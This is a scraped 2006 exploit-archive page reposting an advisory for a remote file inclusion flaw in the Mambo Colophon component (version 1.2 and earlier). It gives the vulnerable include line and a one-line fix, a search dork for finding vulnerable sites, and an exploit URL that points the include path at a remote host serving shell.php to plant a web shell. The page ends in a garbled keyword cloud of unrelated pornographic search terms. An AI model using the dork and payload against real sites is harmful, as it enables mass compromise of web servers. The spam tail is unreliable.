about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Mambo Colophon Component <= 1.2 Remote Inclusion Vulnerability




2006-07-29 Mambo Colophon Component <= 1.2 Remote Inclusion Vulnerability
Rated as : High Risk

###########  Command Mambo Colophon =<1.2 ##by #Drago84#########

      Found By Drago84
Exclusive Security Italian Security

  This bug allows a remote atacker to execute commands via rfi

page:
  admin.colophon.php

bug:

require_once("$mosConfig_absolute_path/components/com_colophon/language/$mosConfig_lang.php");

path:
add in admin.colophon.php
defined( '_VALID_MOS' ) or die( 'hacking attemp.' );

dork: inurl:com_colophon

expl:
htttp:/www.site.it/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://evalsite/shell.php?
securitydot.net - 2006-07-29

Advertising

Copyright 2007, SecurityDot
Fri, 05 Dec 2008 17:54:52 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Seka ms windows ya ali phpBB SQL yabb 2.1 noreen asl wwwxxnx.co sun.erotik wwwxxnx.co www.89.cm. sexpotos Video xl p WWW.SEXOAP 5UP0X0ANPE www.saxe.c Wallpapers japansex.c SLAZYDREAM p...%5C%5C Free sex c freedownlo news for c www.myspaa SLAZYDREAM i...umy.ua Freeporn Sextoons.c www.sex98. redtub SEXY.VIDEO Savixx.com Rani mukha Sextoons.c SANIA MIRZ porntv Free sex S mambo Remo free sexyp sexy girl pakistan s sex horse CMS is Fre Free xxxmo maroc.zic. maroc.zic. Sax image Www.xnx.co free anima Free nude Sex poto